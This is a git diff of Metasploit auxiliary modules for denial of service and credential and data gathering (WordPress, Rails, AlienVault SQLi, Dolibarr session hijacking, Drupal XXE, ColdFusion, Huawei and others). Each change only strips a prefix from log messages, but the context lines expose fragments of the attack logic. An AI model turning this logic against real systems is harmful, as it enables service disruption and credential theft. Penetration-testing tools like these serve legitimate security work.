b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Triggering a heap overflow to cause DoS...") + print_status("Triggering a heap overflow to cause DoS...") begin res = send_request_cgi( @@ -57,16 +57,16 @@ class Metasploit3 < Msf::Auxiliary 'data' => message }) rescue ::Errno::ECONNRESET - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") return end if res - print_error("#{peer} - NFR Agent didn't die, it still answers...") + print_error("NFR Agent didn't die, it still answers...") return end - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") end end diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 40123ce208..3fb0da5c57 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -75,11 +75,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status "#{peer} - Using digit pattern of #{digit_pattern} taken to #{multiplier} places" + print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places" sploit = '[' sploit << evil_float_string sploit << ']' - print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" + print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" target_available = true begin @@ -91,19 +91,19 @@ class Metasploit3 < Msf::Auxiliary 'data' => sploit }) rescue ::Rex::ConnectionRefused - print_error "#{peer} - Unable to connect. (Connection refused)" + print_error "Unable to connect. (Connection refused)" target_available = false rescue ::Rex::HostUnreachable - print_error "#{peer} - Unable to connect. (Host unreachable)" + print_error "Unable to connect. (Host unreachable)" target_available = false rescue ::Rex::ConnectionTimeout - print_error "#{peer} - Unable to connect. (Timeout)" + print_error "Unable to connect. (Timeout)" target_available = false end return unless target_available - print_status "#{peer} - Checking availability" + print_status "Checking availability" begin res = send_request_cgi({ 'method' => verb, @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Auxiliary target_available = false end rescue ::Rex::ConnectionError, Errno::ECONNRESET - print_good "#{peer} - DoS appears successful (Host unreachable)" + print_good "DoS appears successful (Host unreachable)" target_available = false end return unless target_available - print_status "#{peer} - Target is still responsive, DoS was unsuccessful." + print_status "Target is still responsive, DoS was unsuccessful." end end diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index 258f134c4b..8f9e60c3ff 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def user_exists(user) exists = wordpress_user_exists?(user) if exists - print_good("#{peer} - Username \"#{username}\" is valid") + print_good("Username \"#{username}\" is valid") report_cred( ip: rhost, port: rport, @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary return true else - print_error("#{peer} - \"#{user}\" is not a valid username") + print_error("\"#{user}\" is not a valid username") return false end end @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary def run if wordpress_and_online? if validate_user - print_status("#{peer} - Checking if user \"#{username}\" exists...") + print_status("Checking if user \"#{username}\" exists...") unless user_exists(username) print_error('Aborting operation - a valid username must be specified') return @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary starting_thread = 1 while starting_thread < rlimit do ubound = [rlimit - (starting_thread - 1), thread_count].min - print_status("#{peer} - Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") + print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") threads = [] 1.upto(ubound) do |i| @@ -133,20 +133,20 @@ class Metasploit3 < Msf::Auxiliary begin wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout) rescue => e - print_error("#{peer} - Timed out during request #{(starting_thread - 1) + i}") + print_error("Timed out during request #{(starting_thread - 1) + i}") end end end threads.each(&:join) - print_good("#{peer} - Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") + print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") starting_thread += ubound end if wordpress_and_online? - print_error("#{peer} - FAILED: #{target_uri} appears to still be online") + print_error("FAILED: #{target_uri} appears to still be online") else - print_good("#{peer} - SUCCESS: #{target_uri} appears to be down") + print_good("SUCCESS: #{target_uri} appears to be down") end else print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress") diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 489458a65e..1567e9536f 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # try out the available memory in steps # apache will return a server error if the limit is reached while memory_to_use < 1024 - vprint_status("#{peer} - trying memory limit #{memory_to_use}MB") + vprint_status("trying memory limit #{memory_to_use}MB") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary # low timeout because the server error is returned immediately res = send_request_cgi(opts, timeout = 3) rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") break end if res && res.code == 500 # limit reached, return last limit last_limit = memory_to_use - fingerprint_step - vprint_status("#{peer} - got an error - using limit #{last_limit}MB") + vprint_status("got an error - using limit #{last_limit}MB") return last_limit else memory_to_use += fingerprint_step @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary end # no limit can be determined - print_warning("#{peer} - can not determine limit, will use default of #{default_limit}") + print_warning("can not determine limit, will use default of #{default_limit}") return default_limit end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary } space_to_fill = size_bytes - empty_xml.size - vprint_status("#{peer} - max XML space to fill: #{space_to_fill} bytes") + vprint_status("max XML space to fill: #{space_to_fill} bytes") payload = "&#{entity};" * (space_to_fill / 6) entity_value_length = space_to_fill - payload.length @@ -148,15 +148,15 @@ class Metasploit3 < Msf::Auxiliary def run # get the max size - print_status("#{peer} - trying to fingerprint the maximum memory we could use") + print_status("trying to fingerprint the maximum memory we could use") size = fingerprint - print_status("#{peer} - using #{size}MB as memory limit") + print_status("using #{size}MB as memory limit") # only generate once xml = generate_xml(size) for x in 1..rlimit - print_status("#{peer} - sending request ##{x}...") + print_status("sending request ##{x}...") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary c.send_request(r) # Don't wait for a response, can take very long rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index c6f8a24995..fbe1395df8 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -81,37 +81,37 @@ class Metasploit3 < Msf::Auxiliary def run # inform user of action currently selected - print_status("#{peer} - Action: #{action.name} selected") + print_status("Action: #{action.name} selected") # CHECK action if action.name == 'CHECK' - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") if check_user - print_good("#{peer} - User online") + print_good("User online") else - print_status("#{peer} - User offline") + print_status("User offline") end return end # DOS action - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") check_result = check_user if check_result == false - print_error("#{peer} - User is already offline... Exiting...") + print_error("User is already offline... Exiting...") return end # only proceed if action is DOS the target user is # online or the CHECKUSER option has been disabled - print_status("#{peer} - Targeting user: #{@sipuri}...") + print_status("Targeting user: #{@sipuri}...") dos_result = dos_user if dos_result - print_good("#{peer} - User is offline, DoS was successful") + print_good("User is offline, DoS was successful") else - print_error("#{peer} - User is still online") + print_error("User is still online") end end @@ -122,22 +122,22 @@ class Metasploit3 < Msf::Auxiliary res = send_msg(msg) if res.nil? - vprint_good("#{peer} - User #{@sipuri} is no responding") + vprint_good("User #{@sipuri} is no responding") return true elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - DoS packet successful. Response received (430 Flow Failed)") - vprint_good("#{peer} - User #{@sipuri} is no longer responding") + vprint_good("DoS packet successful. Response received (430 Flow Failed)") + vprint_good("User #{@sipuri} is no longer responding") return true elsif res =~ /404 Not Found/i - vprint_error("#{peer} - DoS packet appears successful. Response received (404 Not Found)") - vprint_status("#{peer} - User appears to be currently offline or not in a Sametime video session") + vprint_error("DoS packet appears successful. Response received (404 Not Found)") + vprint_status("User appears to be currently offline or not in a Sametime video session") return true elsif res =~ /200 OK/i vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)") vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer") return false else - vprint_status("#{peer} - Unexpected response") + vprint_status("Unexpected response") return true end end @@ -150,26 +150,26 @@ class Metasploit3 < Msf::Auxiliary # check response for current user status - common return codes if res.nil? - vprint_error("#{peer} - No response") + vprint_error("No response") return false elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - User #{@sipuri} is no longer responding (already DoS'd?)") + vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)") return false elsif res =~ /404 Not Found/i - vprint_error("#{peer} - User #{@sipuri} is currently offline or not in a Sametime video session") + vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session") return false elsif res =~ /200 OK/i - vprint_good("#{peer} - User #{@sipuri} is online") + vprint_good("User #{@sipuri} is online") return true else - vprint_error("#{peer} - Unknown server response") + vprint_error("Unknown server response") return false end end def create_message(length) # create SIP MESSAGE of specified length - vprint_status("#{peer} - Creating SIP MESSAGE packet #{length} bytes long") + vprint_status("Creating SIP MESSAGE packet #{length} bytes long") source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1) source_host = Rex::Socket.source_address(datastore['RHOST']) @@ -215,13 +215,13 @@ class Metasploit3 < Msf::Auxiliary end return res rescue ::Rex::ConnectionRefused - print_status("#{peer} - Unable to connect") + print_status("Unable to connect") return nil rescue ::Errno::ECONNRESET - print_status("#{peer} - DoS packet successful, host not responding.") + print_status("DoS packet successful, host not responding.") return nil rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_status("#{peer} - Couldn't connect") + print_status("Couldn't connect") return nil ensure # disconnect socket if still open diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 353e0dbbf5..8838dd445e 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res and res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res and res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(6) right_marker = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") loop do file = sqli(left_marker, right_marker, i, cookie, filename) diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 353e7ce052..3eeeb94f06 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res && res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary right_marker = Rex::Text.rand_text_alpha(6) sql_true = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") begin ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do @@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary end rescue ::Timeout::Error if full.blank? - print_error("#{peer} - Timeout while exploiting sqli, nothing recovered") + print_error("Timeout while exploiting sqli, nothing recovered") else - print_error("#{peer} - Timeout while exploiting sqli, #{full.length} bytes recovered") + print_error("Timeout while exploiting sqli, #{full.length} bytes recovered") end return end diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index 0dd09d79aa..bfaf631e24 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - Unable to receive a response") + print_error("Unable to receive a response") return end @@ -213,15 +213,15 @@ class Metasploit3 < Msf::Auxiliary if rdspass.empty? and password.empty? # No pass collected, no point to store anything - print_error("#{peer} - No passwords found") + print_error("No passwords found") return end - print_good("#{peer} - rdspassword = #{rdspass}") - print_good("#{peer} - password = #{password}") - print_good("#{peer} - encrypted = #{encrypted}") + print_good("rdspassword = #{rdspass}") + print_good("password = #{password}") + print_good("encrypted = #{encrypted}") p = store_loot('coldfusion.password.properties', 'text/plain', rhost, res.body) - print_good("#{peer} - password.properties stored in '#{p}'") + print_good("password.properties stored in '#{p}'") end end diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index ac02e16386..0967baf944 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # def get_session_tokens tokens = nil - print_status("#{peer} - Finding session tokens...") + print_status("Finding session tokens...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri( @@ -52,15 +52,15 @@ class Metasploit3 < Msf::Auxiliary 'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] } }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 404 - print_error("#{peer} - Could not find 'jqueryFileTree.php'") + print_error("Could not find 'jqueryFileTree.php'") elsif res.code == 200 and res.body =~ />sess_([a-z0-9]+)</ tokens = res.body.scan(/>sess_([a-z0-9]+)</) num_tokens = tokens.length.to_s.gsub(/(\d)(?=(\d\d\d)+(?!\d))/) { "#{$1}," } - print_good("#{peer} - Found #{num_tokens} session tokens") + print_good("Found #{num_tokens} session tokens") else - print_error("#{peer} - Could not find any session tokens") + print_error("Could not find any session tokens") end return tokens end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary # Get user's credentials # def get_user_info(user_id) - vprint_status("#{peer} - Retrieving user's credentials") + vprint_status("Retrieving user's credentials") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'user/fiche.php'), @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary }.to_a.shuffle] }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /User card/ record = [ res.body.scan(/name="login" value="([^"]+)"/ ).flatten.first, @@ -89,11 +89,11 @@ class Metasploit3 < Msf::Auxiliary res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first ] unless record.empty? - print_good("#{peer} - Found credentials (#{record[0]}:#{record[1]})") + print_good("Found credentials (#{record[0]}:#{record[1]})") return record end else - print_warning("#{peer} - Could not retrieve user credentials") + print_warning("Could not retrieve user credentials") end end @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => @cookie }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /<div class="login"><a href="[^"]*\/user\/fiche\.php\?id=(\d+)">/ user_id = "#{$1}" - vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'") + vprint_good("Hijacked session for user with ID '#{user_id}'") return user_id else - vprint_status("#{peer} - Could not hijack session. Session is invalid.") + vprint_status("Could not hijack session. Session is invalid.") end end @@ -125,11 +125,11 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}" }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 200 and res.get_cookies =~ /DOLSESSID_([a-f0-9]{32})=/ return "DOLSESSID_#{$1}=#{token}" else - print_warning("#{peer} - Could not create session cookie") + print_warning("Could not create session cookie") end end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary def progress(current, total) done = (current.to_f / total.to_f) * 100 percent = "%3.2f%%" % done.to_f - vprint_status("#{peer} - Trying to hijack a session - " + + vprint_status("Trying to hijack a session - " + "%7s done (%d/%d tokens)" % [percent, current, total]) end @@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary def run return unless tokens = get_session_tokens credentials = [] - print_status("#{peer} - Trying to hijack a session...") + print_status("Trying to hijack a session...") tokens.flatten.each_with_index do |token, index| if @cookie = create_cookie(token) and user_id = get_user_id credentials << get_user_info(user_id) @@ -189,7 +189,7 @@ class Metasploit3 < Msf::Auxiliary end if credentials.empty? - print_warning("#{peer} - No credentials collected.") + print_warning("No credentials collected.") return end cred_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/gather/drupal_openid_xxe.rb b/modules/auxiliary/gather/drupal_openid_xxe.rb index a7cae618a0..6110eb4ed8 100644 --- a/modules/auxiliary/gather/drupal_openid_xxe.rb +++ b/modules/auxiliary/gather/drupal_openid_xxe.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary res = send_openid_auth(signature) unless res - vprint_status("#{peer} - Connection timed out") + vprint_status("Connection timed out") return Exploit::CheckCode::Unknown end @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary end unless res.code == 500 - print_warning("#{peer} - Unexpected answer, trying to parse anyway...") + print_warning("Unexpected answer, trying to parse anyway...") end error_loot = parse_loot(res.body) @@ -142,12 +142,12 @@ class Metasploit3 < Msf::Auxiliary # Check if file was retrieved on the drupal answer # Better results, because there isn't URL encoding, # plus probably allows to retrieve longer files. - print_status("#{peer} - Searching loot on the Drupal answer...") + print_status("Searching loot on the Drupal answer...") unless loot?(error_loot) # Check if file was leaked to the fake OpenID endpoint # Contents are probably URL encoded, plus probably long # files aren't full, but something is something :-) - print_status("#{peer} - Searching loot on HTTP query...") + print_status("Searching loot on HTTP query...") loot?(@http_loot) end @@ -158,12 +158,12 @@ class Metasploit3 < Msf::Auxiliary def on_request_uri(cli, request) if request.uri =~ /#{@prefix}/ - vprint_status("#{peer} - Signature found, parsing file...") + vprint_status("Signature found, parsing file...") @http_loot = parse_loot(request.uri) return end - print_status("#{peer} - Sending XRDS...") + print_status("Sending XRDS...") send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' }) end @@ -189,7 +189,7 @@ class Metasploit3 < Msf::Auxiliary def store(data) path = store_loot("drupal.file", "text/plain", rhost, data, datastore['FILEPATH']) - print_good("#{peer} - File found and saved to path: #{path}") + print_good("File found and saved to path: #{path}") end def parse_loot(data) diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index b699d58ddf..0fe0e0039c 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -78,11 +78,11 @@ class Metasploit3 < Msf::Auxiliary } die(); EOT - print_status("#{peer} - Reading user credentials from the database") + print_status("Reading user credentials from the database") response = execute_php_code(php) if not response or response.code != 200 then - print_error("#{peer} - Failed: Error requesting page") + print_error("Failed: Error requesting page") return end @@ -93,8 +93,8 @@ class Metasploit3 < Msf::Auxiliary def run credentials = read_credentials if credentials.empty? - print_warning("#{peer} - No credentials collected.") - print_warning("#{peer} - Sometimes this is because the server isn't in the vulnerable state.") + print_warning("No credentials collected.") + print_warning("Sometimes this is because the server isn't in the vulnerable state.") return end diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index dd4bc8e7b6..a75f6dc4b3 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -116,30 +116,30 @@ class Metasploit3 < Msf::Auxiliary requests = datastore['REQUESTS'] backends = [] @uri = normalize_uri(target_uri.path.to_s) - print_status("#{peer} - Starting request #{@uri}") + print_status("Starting request #{@uri}") (1..requests).each do |i| cookie = get_cookie # Get the cookie # If the cookie is not found, stop process if cookie.empty? || cookie[:id].nil? - print_error("#{peer} - F5 BigIP load balancing cookie not found") + print_error("F5 BigIP load balancing cookie not found") return end # Print the cookie name on the first request if i == 1 - print_good("#{peer} - F5 BigIP load balancing cookie \"#{cookie[:id]} = #{cookie[:value]}\" found") + print_good("F5 BigIP load balancing cookie \"#{cookie[:id]} = #{cookie[:value]}\" found") if cookie[:id].start_with?('BIGipServer') - print_good("#{peer} - Load balancing pool name \"#{cookie[:id].split('BIGipServer')[1]}\" found") + print_good("Load balancing pool name \"#{cookie[:id].split('BIGipServer')[1]}\" found") end if cookie[:value].start_with?('rd') - print_good("#{peer} - Route domain \"#{cookie[:value].split('rd')[1].split('o')[0]}\" found") + print_good("Route domain \"#{cookie[:value].split('rd')[1].split('o')[0]}\" found") end end backend = cookie_decode(cookie[:value]) unless backend[:host].nil? || backends.include?(backend) - print_good("#{peer} - Backend #{backend[:host]}:#{backend[:port]} found") + print_good("Backend #{backend[:host]}:#{backend[:port]} found") backends.push(backend) end end @@ -150,10 +150,10 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused - print_error("#{peer} - Network connection error") + print_error("Network connection error") rescue ::Rex::ConnectionError - print_error("#{peer} - Network connection error") + print_error("Network connection error") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/gather/hp_snac_domain_creds.rb b/modules/auxiliary/gather/hp_snac_domain_creds.rb index 7610799f2b..ad4b1c1cd2 100644 --- a/modules/auxiliary/gather/hp_snac_domain_creds.rb +++ b/modules/auxiliary/gather/hp_snac_domain_creds.rb @@ -118,27 +118,27 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Get Domain Info") + print_status("Get Domain Info") session = get_session if session.nil? - print_error("#{peer} - Failed to get a valid session, maybe the target isn't HP SNAC installation?") + print_error("Failed to get a valid session, maybe the target isn't HP SNAC installation?") return end - print_status("#{peer} - Exploiting Authentication Bypass to gather Domain Controller Info...") + print_status("Exploiting Authentication Bypass to gather Domain Controller Info...") domain_info = get_domain_info(session) if domain_info.nil? - print_error("#{peer} - Failed, maybe the target isn't vulnerable") + print_error("Failed, maybe the target isn't vulnerable") return end - print_status("#{peer} - Parsing data gathered...") + print_status("Parsing data gathered...") credentials = parse_domain_data(domain_info) if credentials.empty? - print_warning("#{peer} - Any Domain Controller has been found...") + print_warning("Any Domain Controller has been found...") return end diff --git a/modules/auxiliary/gather/huawei_wifi_info.rb b/modules/auxiliary/gather/huawei_wifi_info.rb index f817643557..83e648b066 100644 --- a/modules/auxiliary/gather/huawei_wifi_info.rb +++ b/modules/auxiliary/gather/huawei_wifi_info.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def get_wifi_info - print_status("#{peer} - Getting WiFi Key details...") + print_status("Getting WiFi Key details...") res = send_request_raw( { 'method' => 'GET', @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary def get_router_info - print_status("#{peer} - Gathering basic device information...") + print_status("Gathering basic device information...") res = send_request_raw( { 'method' => 'GET', @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_ssid - print_status("#{peer} - Gathering device SSID...") + print_status("Gathering device SSID...") res = send_request_raw( { @@ -183,7 +183,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_mac_filter_info - print_status("#{peer} - Gathering MAC filters...") + print_status("Gathering MAC filters...") res = send_request_raw( { 'method' => 'GET', @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_wan_info - print_status("#{peer} - Gathering WAN information...") + print_status("Gathering WAN information...") res = send_request_raw( { 'method' => 'GET', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_dhcp_info - print_status("#{peer} - Gathering DHCP information...") + print_status("Gathering DHCP information...") res = send_request_raw( { 'method' => 'GET', @@ -274,19 +274,19 @@ class Metasploit3 < Msf::Auxiliary def is_target?(res) # check whether we got any response from server and proceed. unless res - print_error("#{peer} - Failed to get any response from server") + print_error("Failed to get any response from server") return false end # Is it a HTTP OK unless res.code == 200 - print_error("#{peer} - Did not get HTTP 200, URL was not found") + print_error("Did not get HTTP 200, URL was not found") return false end # Check to verify server reported is a Huawei router unless res.headers['Server'].match(/IPWEBS\/1.4.0/i) - print_error("#{peer} - Target doesn't seem to be a Huawei router") + print_error("Target doesn't seem to be a Huawei router") return false end diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index e2269fe1bb..20b3d6911b 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary @charset.push(Rex::Text.uri_encode(spec)) end end - print_status("#{peer} - Performing Bruteforce attack") - vprint_status("#{peer} - Using CHARSET: [#{@charset.join(",")}]") + print_status("Performing Bruteforce attack") + vprint_status("Using CHARSET: [#{@charset.join(",")}]") else - print_status("#{peer} - Performing dictionary based attack (#{datastore['DICT']})") + print_status("Performing dictionary based attack (#{datastore['DICT']})") end if datastore['DICT'].blank? and datastore['MAXDEPTH'] > 2 # warn user on long runs - print_status("#{peer} - Depth level #{datastore['MAXDEPTH']} selected... this may take some time!") + print_status("Depth level #{datastore['MAXDEPTH']} selected... this may take some time!") end # create initial test queue and populate @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary @charset.each { |char| @test_queue.push(char) } else ::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) } - vprint_status("#{peer} - Loaded #{@test_queue.length} values from dictionary") + vprint_status("Loaded #{@test_queue.length} values from dictionary") end @depth_warning = true @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Testing for IBM Lotus Notes Sametime User Enumeration flaw") + print_status("Testing for IBM Lotus Notes Sametime User Enumeration flaw") # test for expected response code on non-existant uid/email if datastore['TYPE'] == "UID" @@ -126,17 +126,17 @@ class Metasploit3 < Msf::Auxiliary begin if res.nil? - print_error("#{peer} - Timeout") + print_error("Timeout") return elsif res.code != 200 - print_error("#{peer} - Unexpected response from server (Response code: #{res.code})") + print_error("Unexpected response from server (Response code: #{res.code})") return elsif JSON.parse(res.body) # valid JSON response - valid response for check - print_good("#{peer} - Response received, continuing to enumeration phase") + print_good("Response received, continuing to enumeration phase") end rescue JSON::ParserError, - print_error("#{peer} - Error parsing JSON: Invalid response from server") + print_error("Error parsing JSON: Invalid response from server") return end @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end def test_handler - 